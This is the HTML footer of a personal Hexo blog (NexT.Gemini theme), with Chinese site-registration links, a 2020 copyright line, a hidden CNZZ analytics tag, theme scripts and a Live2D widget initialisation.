        
  <div class="beian"><a href="https://beian.miit.gov.cn" rel="noopener" target="_blank">粤ICP备18132442号-1 </a>
      <img src="/gongan.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" rel="noopener" target="_blank">粤公网安备 44011202000643号 </a>
  </div>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">XiaoLeung</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">240k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">3:38</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        


  <div style="display: none;">
    <script src="//s95.cnzz.com/z_stat.php?id=true&web_id=true"></script>
  </div>






      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
